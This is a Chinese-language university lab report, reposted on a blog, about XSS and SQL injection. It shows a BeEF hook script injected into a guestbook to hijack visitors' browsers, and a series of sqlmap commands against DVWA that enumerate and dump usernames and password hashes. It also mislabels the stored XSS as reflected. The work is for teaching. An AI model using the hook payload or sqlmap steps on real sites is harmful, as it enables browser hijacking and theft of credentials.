实验二、XSS和SQL注入

最新推荐文章于 2024-01-31 21:04:21 发布
最新推荐文章于 2024-01-31 21:04:21 发布
阅读量551 收藏 1
点赞数
文章标签: 数据库 php 操作系统
原文链接:http://www.cnblogs.com/BASE64/p/10898943.html
版权

一、  实验目的

了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

 

二、  系统环境:Kali Linux2、Windows

 

三、  网络环境:交换网络结构

 

四、  实验工具:AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;Dvwa;PHPStudy

 

五、  实验步骤:

1XSS部分:利用Beef劫持被攻击者客户端浏览器

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(Win2003、IIS、guestbook搭建)

攻击者:Kali(使用beef生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

1、 利用AWVS扫描留言簿网站http://gbook.ziyexing.com/leaveword/,发现其存在XSS漏洞,截图。

 

 

 

 

2、首先修改beef的默认登陆用户名和密码:

进入/etc/beef-xss文件夹。

 

 

 

 

Kali使用beef生成恶意代码,这个主要就是进入/etc/share/beef-xss文件夹,然后输入./beef运行beef,就会自动生成恶意代码,截图。

 

 

 

 

3、用另一台win7的虚拟机访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://Kali的IP地址:3000/hook.js"></script>,截图

 

 

 

 

 

3、查看用户留言,只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页(百度主页),将拟在beff中的配置截图。

 

 

 

 

 

5、回答问题:实验中XSS攻击属于哪种类型?

XSS属于反射型攻击。

 

 

 

SQL注入部分:DVWA+SQLmap+Mysql注入实战

https://blog.51cto.com/huangzp/1899871

实验环境搭建。见参考文档2.搭建DVWA测试环境和SQL注入之SQLmap入门.docx

1、注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入1,返回

ID: 1

First name: admin

Surname: admin

返回正常:

 

 

 

再次输入1',报错,返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

 

 

此时可以断定有SQL注入漏洞,

http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;

 

 

 

 

 

2、枚举当前使用的数据库名称和用户名。

   

 

 

你输入的命令:

 

 

Sqlmap输出截图。                                                                                                                     

 

 

 

3、枚举数据库用户名和密码。

(1)你输入的命令:

sqlmap -u "http://192.168.43.148/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=pvij1sd29ufd1uho9v6svc2je2' --string="Surname" --users --password

 

(2)Sqlmap输出截图。

 

4、枚举数据库

 

 

--dbs:枚举当前数据库

(1)你输入的命令:

sqlmap -u "http://192.168.43.148/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=pvij1sd29ufd1uho9v6svc2je2' --string="Surname" –dbs

 

(2)Sqlmap输出截图:

 

 

 

 

5、枚举数据库和指定数据库的数据表

 -D 数据库名:指定数据库

--tables:枚举指定数据库的所有表

(1)你输入的命令:

sqlmap -u "http://192.168.43.148/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=pvij1sd29ufd1uho9v6svc2je2' --string="Surname" -D dvwa –tables

 

(2)Sqlmap输出截图。

 

 

 

 

6、获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

--columns:获取列的信息

 

(1)你输入的命令:

sqlmap -u "http://192.168.43.148/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=pvij1sd29ufd1uho9v6svc2je2' --string="Surname" -D dvwa -T users –columns

 

(2)Sqlmap输出截图。

 

 

 

 

7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列

--dump:存储数据表项

  

(1)你输入的命令:

sqlmap -u "http://192.168.43.148/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=pvij1sd29ufd1uho9v6svc2je2' --string="Surname" -D dvwa -T users -C user,password –dump

 

(2)Sqlmap输出截图:

 

 

 

(3)查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)

 

 

 

转载于:https://www.cnblogs.com/BASE64/p/10898943.html

weixin_30525825
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验三:XSSSQL注入
yghlqgt的博客
11-27 715
试验前需要掌握的知识 下面内容是试验前你需要了解并掌握的知识,详细的内容可以移步到这篇博客中去学习:试验前的知识储备 XSS部分 1、什么是XSS 2 、什么是XSS攻击 3、 什么是Cookie 4、XSS漏洞的分类 5、XSS的防御 SQL注入部分 1、什么是SQL注入攻击 2、为何会有SQL注入攻击 3. 何时使用SQL注入攻击 4、MySQL简介 5、实施SQL注入攻击 6、防范SQL注入方法汇总 实验部分 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入
WEB安全之XSS漏洞与SQL注入漏洞介绍及解决方案
m0_74131821的博客
04-18 1750
这篇文章把XSS跨站攻击和SQL注入的相关知识整理了下,比较适合初学者观看。
【web应用安全攻防技术】02 SQL注入 & XSS注入
m0_57432233的博客
01-31 1780
SQL注入攻击是利用Web应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术跨站脚本是一种通常存在于Web应用程序中的安全漏洞,使得攻击者可以将恶意的代码注入到网页中,从而危害其他Web访问者(敏感信息、客户端渗透攻击等)客户端脚本:Javascript,Flash ActionScript等。
网络渗透测试实验XSSSQL注入
weixin_62599268的博客
11-22 685
网络渗透测试实验XSSSQL注入
【白帽子学习笔记】XSSSQL注入
python_LC_nohtyp的博客
11-17 1530
【白帽子学习笔记】XSSSQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记】XSSSQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
网络渗透测试 XSSSQL注入
12-02
了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;...
软件安全实验2 SQL注入实验
最新发布
06-19
分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、SQL Injection(SQL注入)...
适用于asp.net以及IIS服务器测试的网站源码(含有xss以及sql注入漏洞)
05-25
进行网络攻防实践实验+含有xss以及sql注入漏洞+测试IIS服务器网站配置是否成功+为asp.net框架
面向SQL注入XSS攻击的Web入侵检测系统的研究与实现 (1).pdf
01-04
面向SQL注入XSS攻击的Web入侵检测系统的研究与实现 本文主要研究了面向SQL注入XSS攻击的Web入侵检测系统的设计与实现。随着Web应用的快速发展,Web程序受到攻击的风险也随之增加,导致严重的数据泄露和财产损失...
网络安全项目(XXS、SQL注入、dos)
06-16
本次实验要求在网络攻防实验环境中使用工具软件对给定的记录文件进行入侵检测,并对检测出的...通过SQL注入攻击、DOS攻击和XSS跨站脚本攻击,掌握网站的工作机制,认识到这几种攻击的防范措施,加强对Web攻击的防范。
xss攻击和sql注入
03-19
xss攻击和sql注入
预防XSS攻击和SQL注入XssFilter
07-23
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。 XSS漏洞的危害 (1)网络钓鱼,包括盗取各类用户账号; (2)窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; (3)劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等; (4)强制弹出广告页面、刷流量等; (5)网页挂马; (6)进行恶意操作,例如任意篡改页面信息、删除文章等; (7)进行大量的客户端攻击,如DDoS攻击; (8)获取客户端信息,例如用户的浏览历史、真实IP、开放端口等; (9)控制受害者机器向其他网站发起攻击; (10)结合其他漏洞,如CSRF漏洞,实施进一步作恶; (11)提升用户权限,包括进一步渗透网站; (12)传播跨站脚本蠕虫等; 三、过滤器配置 web.xml配置 XssFilter com.xxx.Filter.XssFilter XssFilter /*
扫描sql注入xss攻击的牛b工具
11-02
扫描sql注射与xss攻击的牛b工具,适合新手初入渗透测试使用的工具,很好有效辅助你们对网站的渗透测试。
XSS与SQL的简单介绍
qq_53188113的博客
12-23 902
XSS 1、什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 2、什么是XSS攻击 XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTML语言允许使用脚本进行简单交互,入..
XSS跨域攻击和SQL注入解决方案
不积跬步无以至千里
01-31 3531
1.配置web.xml的filter public class XSSFilter implements Filter { public void init(FilterConfig filterConfig) throws ServletException { } public void doFilter(ServletRequest request, ServletResp
DFX 安全测试-- 告诉你什么是XSSsql注入?POST和GET的区别....
a64910807的博客
02-25 954
1、用户权限测试  (1) 用户权限控制   1) 用户权限控制主要是对一些有权限控制的功能进行验证   2) 用户A才能进行的操作,B是否能够进行操作(可通过窜session,将在下面介绍)   3)只能有A条件的用户才能查看的页面,是否B能够查看(可直接敲URL访问)   (2) 页面权限控制   1) 必须有登陆权限的页面,是否能够在不登陆情况下进行访问   2)...
常见sql注入语句和xss注入语句
小白博客
12-22 2843
1 and 1=1 或者1' and '1'='1 判断注入的类型 1 order by 1,2,3,4 数字类型为例;判断当前表存在多少个属性字段1' union select 1,table_name from information_schema.tables where table_schema=database()# 通过占位获取的数据库名 去MySQL的元数据表information_schema中查表名1' union select 1,c...
SQL 注入、XSS 攻击、CSRF 攻击
weixin_33910434的博客
09-22 1180
SQL 注入、XSS 攻击、CSRF 攻击 SQL 注入 什么是 SQL 注入 SQL 注入,顾名思义就是通过注入 SQL 命令来进行攻击,更确切地说攻击者把 SQL 命令插入到 web 表单或请求参数的查询字符串里面提交给服务器,从而让服务器执行编写的恶意的 SQL 命令。 对于 web 开发者来说,SQL 注入已然是非常熟悉的,而且 SQL 注入已经生存了 10 多...
Sql注入Xss攻击的了解
赵筱蕊的博客
05-15 2406
Xss攻击是跨站脚本工具 Csrf攻击是跨站请求伪造 sql注入 DDOS流量攻击? 防止xss脚本攻击 Xss攻击即跨站脚本攻击,通过篡改网页,注入而已的HTML脚本,控制用户浏览器进行恶意操作的一种攻击。 防止:script 注入,转义过滤script标签Htmlentities(把字符串转为Html实体) 防止csrf跨转请求伪造 CSRF的防御可以从服务端和客户端...
课程11-Web应用的攻击及防御技术(下)1
08-03
1. Web应用程序体系结构及其安全威胁 2. Web应用安全攻防技术概述 4. 课堂实践:具体SQL注入漏洞测试 5. XSS跨站脚本攻击 6. 课外实践作业

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值